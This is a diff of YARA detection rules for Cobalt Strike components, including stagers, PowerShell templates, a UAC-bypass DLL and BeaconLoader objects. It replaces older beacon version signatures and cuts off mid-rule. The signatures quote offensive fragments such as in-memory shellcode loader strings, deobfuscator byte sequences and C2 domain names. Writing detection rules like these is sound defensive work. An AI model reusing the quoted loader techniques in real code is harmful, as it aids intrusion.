"https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L594-L625" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Dnsstager_Bin_v1_47_through_v4_x.yara#L17-L78" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "c78e70cd74f4acda7d1d0bd85854ccacec79983565425e98c16a9871f1950525" - logic_hash = "c2e975678815638803b04261d46bca216bc0b2f894a1f72fd0d5b949493401d1" + hash = "10f946b88486b690305b87c14c244d7bc741015c3fef1c4625fa7f64917897f1" + logic_hash = "d4500d8a83a821e1df9e808b17a87c1207d78ea0e03886544a632176fe93ccd0" score = 75 - quality = 85 + quality = 83 tags = "" strings: - $version_sig = { 48 57 8B F1 83 F8 43 0F 87 07 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $apiLocator = { + 31 ?? + AC + C1 ?? 0D + 01 ?? + 38 ?? + 75 ?? + 03 [2] + 3B [2] + 75 ?? + 5? + 8B ?? 24 + 01 ?? + 66 8B [2] + 8B ?? 1C + 01 ?? + 8B ?? 8B + 01 ?? + 89 [3] + 5? + 5? + } + $dnsapi = { 68 64 6E 73 61 } condition: - all of them + $apiLocator and $dnsapi } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_6 +rule GCTI_Cobaltstrike_Resources_Template__X32_X64_Ps1_V1_45_To_V2_5_And_V3_11_To_V3_14 { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.6" + description = "Cobalt Strike's resources/template.x64.ps1, resources/template.x32 from v3.11 to v3.14 and resources/template.ps1 from v1.45 to v2.5 " author = "gssincla@google.com" - id = "7e7b5c22-82b3-5298-b794-b06d94a668d5" + id = "c9fa6a39-0098-5dde-9762-94bc6b2df299" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L627-L657" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template__x32_x64_Ps1_v1_45_to_v2_5_and_v3_11_to_v3_14.yara#L17-L43" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "495a744d0a0b5f08479c53739d08bfbd1f3b9818d8a9cbc75e71fcda6c30207d" - logic_hash = "3bd3f0b8625e131726fa92d68de041dae6c3d5642cbf22ac596d1d82da1d4a07" + hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87" + logic_hash = "5196f111f257239d2e7e4ca342e7fc8bac1687743bc8c7ff23addf1f094b2e93" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F9 83 F8 47 0F 87 2F 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $importVA = "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc" nocase + $importCT = "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread" nocase + $importWFSO = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject" nocase + $compiler = "New-Object Microsoft.CSharp.CSharpCodeProvider" nocase + $params = "New-Object System.CodeDom.Compiler.CompilerParameters" nocase + $paramsSys32 = ".ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" nocase + $paramsGIM = ".GenerateInMemory = $True" nocase + $result = "$compiler.CompileAssemblyFromSource($params, $assembly)" nocase condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_7 +rule GCTI_Cobaltstrike_Resources_Covertvpn_Injector_Exe_V1_44_To_V2_0_49 { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.7" + description = "Cobalt Strike's resources/covertvpn-injector.exe signature for version v1.44 to v2.0.49" author = "gssincla@google.com" - id = "6352a31c-34b8-5886-8e34-ef9221c22e6e" + id = "48485ae2-1d99-5fa8-b8e8-0047e92ef447" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L659-L689" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_injector_Exe_v1_44_to_v2_0_49.yara#L17-L116" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "f18029e6b12158fb3993f4951dab2dc6e645bb805ae515d205a53a1ef41ca9b2" - logic_hash = "6ceb2cec8402a4679bad42d367156c74e897af4188442fdebc70d6ce2dd78bd6" + hash = "d741751520f46602f5a57d1ed49feaa5789115aeeba7fa4fc7cbb534ee335462" + logic_hash = "119602efe6243d8c0dc7b8f4468eb9b3be292620920f69dc8a560f900ac7f622" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F9 83 F8 49 0F 87 47 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $dropComponentsAndActivateDriver_prologue = { + C7 04 24 [4] + E8 [4] + 83 EC 04 + C7 44 24 04 [4] + 89 04 24 + E8 59 14 00 00 + 83 EC 08 + 89 45 ?? + 83 7D ?? 00 + 74 ?? + E8 [4] + 8D [2] + 89 [3] + 89 04 24 + } + $dropFile = { + C7 44 24 04 00 00 00 00 + 8B [2] + 89 ?? 24 + E8 [4] + 83 F8 FF + 74 ?? + 8B [2] + 89 ?? 24 04 + C7 04 24 [4] + E8 [4] + E9 [4] + C7 44 24 18 00 00 00 00 + C7 44 24 14 80 01 00 00 + C7 44 24 10 02 00 00 00 + C7 44 24 0C 00 00 00 00 + C7 44 24 08 05 00 00 00 + C7 44 24 04 00 00 00 40 + 8B [2] + 89 04 24 + E8 [4] + 83 EC 1C + 89 45 ?? + } + $nfp = "npf.sys" nocase + $wpcap = "wpcap.dll" nocase condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_8 +rule GCTI_Cobaltstrike_Resources_Reverse64_Bin_V2_5_Through_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.8" + description = "Cobalt Strike's resources/reverse64.bin signature for versions v2.5 to v4.x" author = "gssincla@google.com" - id = "f76712a4-df1c-5e6b-b5ac-9c74f2e202fc" + id = "966e6e4c-85e2-5c94-8245-25367802b7d2" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L691-L731" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse64_Bin_v2_5_through_v4_x.yara#L17-L99" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603" - logic_hash = "a0c78dd7cda055bc76a8661b0416a302d7b05d03eeea483d2d1695093cd6dc90" + hash = "d2958138c1b7ef681a63865ec4a57b0c75cc76896bf87b21c415b7ec860397e8" + logic_hash = "c657234156293b9ac363b677490739ab0b5cc2ef149c9d9c37332dab9bb012f6" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } - $xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go" - $c2_1 = "ns7.softline.top" xor - $c2_2 = "ns8.softline.top" xor - $c2_3 = "ns9.softline.top" xor + $apiLocator = { + 48 [2] + AC + 41 [2] 0D + 41 [2] + 38 ?? + 75 ?? + 4C [4] + 45 [2] + 75 ?? + 5? + 44 [2] 24 + 49 [2] + 66 [4] + 44 [2] 1C + 49 [2] + 41 [3] + 48 + } + $calls = { + 48 89 C1 + 41 BA EA 0F DF E0 + FF D5 + 48 [2] + 6A ?? + 41 ?? + 4C [2] + 48 [2] + 41 BA 99 A5 74 61 + FF D5 + } condition: - $version_sig and $decoder and not (2 of ($c2_*) or $xmrig_srcpath) + $apiLocator and $calls } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11 +rule GCTI_Cobaltstrike_Resources_Httpstager64_Bin_V3_2_Through_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.11" + description = "Cobalt Strike's resources/httpstager64.bin signature for versions v3.2 to v4.x" author = "gssincla@google.com" - id = "00e42396-db81-5d43-90ee-5a97b379019e" + id = "5530dce8-e5a1-5133-9b05-464e3397084a" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L739-L770" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager64_Bin_v3_2_through_v4_x.yara#L17-L85" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "2428b93464585229fd234677627431cae09cfaeb1362fe4f648b8bee59d68f29" - logic_hash = "24ca0a9c2249d1872a53dc228234bdc6803bdfe9e80847995e0951184a8d935c" + hash = "ad93d1ee561bc25be4a96652942f698eac9b133d8b35ab7e7d3489a25f1d1e76" + logic_hash = "23666169565c6b3e5fa71767dc31096e7a25be049eeab16b074053d76c97c70b" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B FA 83 F8 50 0F 87 11 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $apiLocator = { + 48 [2] + AC + 41 [2] 0D + 41 [2] + 38 ?? + 75 ?? + 4C [4] + 45 [2] + 75 ?? + 5? + 44 [2] 24 + 49 [2] + 66 [4] + 44 [2] 1C + 49 [2] + 41 [3] + 48 + } + $postInternetOpenJmp = { + 41 ?? 3A 56 79 A7 + FF ?? + EB + } condition: - all of them + $apiLocator and $postInternetOpenJmp } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11_Bugfix_And_V3_12 +rule GCTI_Cobaltstrike_Resources_Xor_Bin_V2_X_To_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.11-bugfix and 3.12" + description = "Cobalt Strike's resource/xor.bin signature for version 2.x through 4.x" author = "gssincla@google.com" - id = "08ff2a2f-97bd-5839-b414-d67fbf2cdb0f" + id = "1754746c-3a42-5f7d-808a-ba2e1c0a270e" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L772-L804" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__32bit_v2_x_to_4_x.yara#L17-L36" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "5912c96fffeabb2c5c5cdd4387cfbfafad5f2e995f310ace76ca3643b866e3aa" - logic_hash = "566eb14f918ad422d5a273390263e63ac37b00cd10ac3561e038fb1a27f85d80" + hash = "211ccc5d28b480760ec997ed88ab2fbc5c19420a3d34c1df7991e65642638a6f" + logic_hash = "ad662a263ede6c3ba964baf8abe4848ed1e994f2c236d4315cb60c1d51442620" score = 75 quality = 85 tags = "" - rs2 = "4476a93abe48b7481c7b13dc912090b9476a2cdf46a1c4287b253098e3523192" strings: - $version_sig = { 48 57 8B FA 83 F8 50 0F 87 0D 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $stub52 = {fc e8 ?? ?? ?? ?? [1-32] eb 27 5? 8b ?? 83 c? ?4 8b ?? 31 ?? 83 c? ?4 5? 8b ?? 31 ?? 89 ?? 31 ?? 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb ea 5? ff e? e8 d4 ff ff ff} + $stub56 = {fc e8 ?? ?? ?? ?? [1-32] eb 2b 5d 8b ?? ?? 83 c5 ?4 8b ?? ?? 31 ?? 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e8 5? ff e? e8 d? ff ff ff} condition: - all of them + any of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_13 +rule GCTI_Cobaltstrike_Resources_Bypassuac_X64_Dll_V3_3_To_V3_14_And_Sleeve_Bypassuac_X64_Dll_V4_0_And_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.13" + description = "Cobalt Strike's resources/bypassuac-x64.dll from v3.3 to v3.14 (64-bit version) and sleeve/bypassuac.x64.dll from v4.0 to at least v4.4" author = "gssincla@google.com" - id = "98dd32e6-9bb5-57b2-a5e5-1c74a0d1e6d3" + id = "eef83901-63d9-55a3-b115-03f420416177" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L806-L836" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_x64_Dll_v3_3_to_v3_14_and_Sleeve_Bypassuac_x64_Dll_v4_0_and_v4_x.yara#L17-L86" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "362119e3bce42e91cba662ea80f1a7957a5c2b1e92075a28352542f31ac46a0c" - logic_hash = "adafac8692ad676b0168b3e829bc7948db72953b95c79d483ae1a05f1d4f9b2b" + hash = "9ecf56e9099811c461d592c325c65c4f9f27d947cbdf3b8ef8a98a43e583aecb" + logic_hash = "d76e3601f61ae164a8df9048d59d15cd6913e64adb93132244e83f40bf67d86a" score = 75 quality = 85 tags = "" strings: - $version_sig = { 4A 56 57 83 FA 5A 0F 87 2D 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $deleteFileCOM = { + 48 8B [5] + 45 33 ?? + 48 8B ?? + FF 90 90 00 00 00 + 85 C0 + 75 ?? + 48 8B [5] + 48 8B ?? + FF 92 A8 00 00 00 + 85 C0 + } + $copyFileCOM = { + 48 8B [5] + 4C 8B [5] + 48 8B [5] + 48 8B ?? + 4C 8B ?? + 48 89 [3] + FF 90 80 00 00 00 + 85 C0 + 0F 85 [4] + 48 8B [5] + 48 8B 11 + FF 92 A8 00 00 00 + } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_14 +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X86_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.14" + description = "Cobalt Strike's sleeve/BeaconLoader.HA.x86.o (HeapAlloc) Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "00edfc72-c7b8-5100-8275-ae3548b96e49" + id = "0ee3fa6f-367c-596f-a3bc-3bcfa61b97aa" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L838-L866" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L17-L59" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "254c68a92a7108e8c411c7b5b87a2f14654cd9f1324b344f036f6d3b6c7accda" - logic_hash = "6faed2b69647b87d86d46ae73ad92cfe7b2746c306cd7480dc9f0c484c8882e2" + hash = "8e4a1862aa3693f0e9011ade23ad3ba036c76ae8ccfb6585dc19ceb101507dcd" + logic_hash = "d02257bc556d0b1675997ab6af1b28cf5f498855d6254e3c1cd7eb4a0c4d2715" score = 75 quality = 85 tags = "" - rs2 = "87b3eb55a346b52fb42b140c03ac93fc82f5a7f80697801d3f05aea1ad236730" strings: - $version_sig = { 83 FA 5B 77 15 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $core_sig = { + C6 45 F0 48 + C6 45 F1 65 + C6 45 F2 61 + C6 45 F3 70 + C6 45 F4 41 + C6 45 F5 6C + C6 45 F6 6C + C6 45 F7 6F + C6 45 F8 63 + C6 45 F9 00 + } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_0_Suspected +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X86_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's sleeve/beacon.dll Versions 4.0 (suspected, not confirmed)" + description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x86.o (MapViewOfFile) Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "50ff6e44-ebc0-5000-a816-b385a6675768" + id = "3f7c0553-989e-53e7-87a9-3fa1c47f4b62" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L868-L901" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L61-L111" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "e2b2b72454776531bbc6a4a5dd579404250901557f887a6bccaee287ac71b248" - logic_hash = "6875099bc6df26f829f9f64e70bd7fdac6ac7b83a5596fc9359c127fef4e6db5" + hash = "cded3791caffbb921e2afa2de4c04546067c3148c187780066e8757e67841b44" + logic_hash = "dd831fb01a403213c06e3d07daf3da5f56655619a686149f9d4beec2331fe6ca" score = 75 quality = 85 tags = "" strings: - $version_sig = { 51 4A 56 57 83 FA 62 0F 87 8F 03 00 00 FF 24 95 56 7B 00 10 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $core_sig = { + C6 45 EC 4D + C6 45 ED 61 + C6 45 EE 70 + C6 45 EF 56 + C6 45 F0 69 + C6 45 F1 65 + C6 45 F2 77 + C6 45 F3 4F + C6 45 F4 66 + C6 45 F5 46 + C6 45 F6 69 + C6 45 F7 6C + C6 45 F8 65 + C6 45 F9 00 + } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_1_And_V4_2 +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X86_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's sleeve/beacon.dll Versions 4.1 and 4.2" + description = "Cobalt Strike's sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "793df916-bdf7-5743-b008-0113caf38bae" + id = "5f89c4be-f4c5-54d3-b923-d125de53902f" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L903-L934" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L114-L194" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "daa42f4380cccf8729129768f3588bb98e4833b0c40ad0620bb575b5674d5fc3" - logic_hash = "7280a5c3f478ea40b6b72fb4669d5b8c21603e7fbfbc3815a83bc462ee19c0f5" + hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1" + logic_hash = "19b2297986bd72204fb117560cddcfb512f5db6c157d9730b5802bf9f968eef4" score = 75 quality = 85 tags = "" - rs2 = "9de55f27224a4ddb6b2643224a5da9478999c7b2dea3a3d6b3e1808148012bcf" strings: - $version_sig = { 48 57 8B F2 83 F8 63 0F 87 3C 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $core_sig = { + C6 45 B0 56 + C6 45 B1 69 + C6 45 B2 72 + C6 45 B3 74 + C6 45 B4 75 + C6 45 B5 61 + C6 45 B6 6C + C6 45 B7 41 + C6 45 B8 6C + C6 45 B9 6C + C6 45 BA 6F + C6 45 BB 63 + C6 45 BC 00 + } + $deobfuscator = { + 8B 4D FC + 83 C1 01 + 89 4D FC + 8B 55 FC + 3B 55 0C + 73 19 + 0F B6 45 10 + 8B 4D 08 + 03 4D FC + 0F BE 11 + 33 D0 + 8B 45 08 + 03 45 FC + 88 10 + EB D6 + } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X86_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's sleeve/beacon.dll Versions 4.3 and 4.4" + description = "Cobalt Strike's sleeve/BeaconLoader.x86.o Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "976e087c-f371-5fc6-85f8-9c803a91f549" + id = "32a47966-f3bb-52c3-a977-82a1b09ddf2c" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L936-L967" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L196-L276" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f" - logic_hash = "6608a84c4fd3bf77fd5b426da8be250d8b99878bd746fa23789f4791a164ce33" + hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1" + logic_hash = "cab5441ce7d919101fc04aa469e77b71a4c444443e44c752f18cbbc5b17ed5c2" score = 75 quality = 85 tags = "" - rs2 = "78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc" strings: - $version_sig = { 48 57 8B F2 83 F8 65 0F 87 47 03 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $core_sig = { + C6 45 B0 56 + C6 45 B1 69 + C6 45 B2 72 + C6 45 B3 74 + C6 45 B4 75 + C6 45 B5 61 + C6 45 B6 6C + C6 45 B7 41 + C6 45 B8 6C + C6 45 B9 6C + C6 45 BA 6F + C6 45 BB 63 + C6 45 BC 00 + } + $deobfuscator = { + 8B 4D FC + 83 C1 01 + 89 4D FC + 8B 55 FC + 3B 55 0C + 73 19 + 0F B6 45 10 + 8B 4D 08 + 03 4D FC + 0F BE 11 + 33 D0 + 8B 45 08 + 03 45 FC + 88 10 + EB D6 + } condition: - all of them + $core_sig and not $deobfuscator } -rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_7_Suspected +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X64_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's sleeve/beacon.dll Versions 4.7 (suspected, not confirmed)" + description = "Cobalt Strike's sleeve/BeaconLoader.HA.x64.o (HeapAlloc) Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "4b6f90dd-69f3-5555-9195-6a0aed0fff58" + id = "9b16ff13-2d8e-51dc-9f99-6c45eff76feb" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L969-L1002" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L281-L323" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "da9e91b3d8df3d53425dd298778782be3bdcda40037bd5c92928395153160549" - logic_hash = "297ff7c3acfe6f9676dc6c265c548f017f39ccc5217617344e3bccc704ac4c78" + hash = "d64f10d5a486f0f2215774e8ab56087f32bef19ac666e96c5627c70d345a354d" + logic_hash = "b712a0c218e473f6c64fdead22b291d7fb0bac8ba614adcf1ba6431e854a5e65" score = 75 quality = 85 tags = "" strings: - $version_sig = { 53 56 48 57 8B F2 83 F8 67 0F 87 5E 03 00 00 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $core_sig = { + C6 44 24 38 48 + C6 44 24 39 65 + C6 44 24 3A 61 + C6 44 24 3B 70 + C6 44 24 3C 41 + C6 44 24 3D 6C + C6 44 24 3E 6C + C6 44 24 3F 6F + C6 44 24 40 63 + C6 44 24 41 00 + } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_2 +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X64_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.2" + description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x64.o (MapViewOfFile) Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "61188243-0b90-5bff-bcc8-50f10ed941f6" + id = "38e063db-3d76-5a94-812a-945fcf46a232" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1029-L1068" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L326-L374" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "5993a027f301f37f3236551e6ded520e96872723a91042bfc54775dcb34c94a1" - logic_hash = "3803aaac537aec0b188870177e510a3789a71c19be576569b59aa146b2ba62c5" + hash = "9d5b6ccd0d468da389657309b2dc325851720390f9a5f3d3187aff7d2cd36594" + logic_hash = "6224000342d87041fd3336656897479c644e94ea36fc061c27fcd64233047c2c" score = 75 quality = 85 tags = "" strings: - $version_sig = { 4C 8D 05 9F F8 FF FF 8B D3 48 8B CF E8 05 1A 00 00 - EB 0A 8B D3 48 8B CF E8 41 21 00 00 48 8B 5C 24 30 - 48 83 C4 20 } - $decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 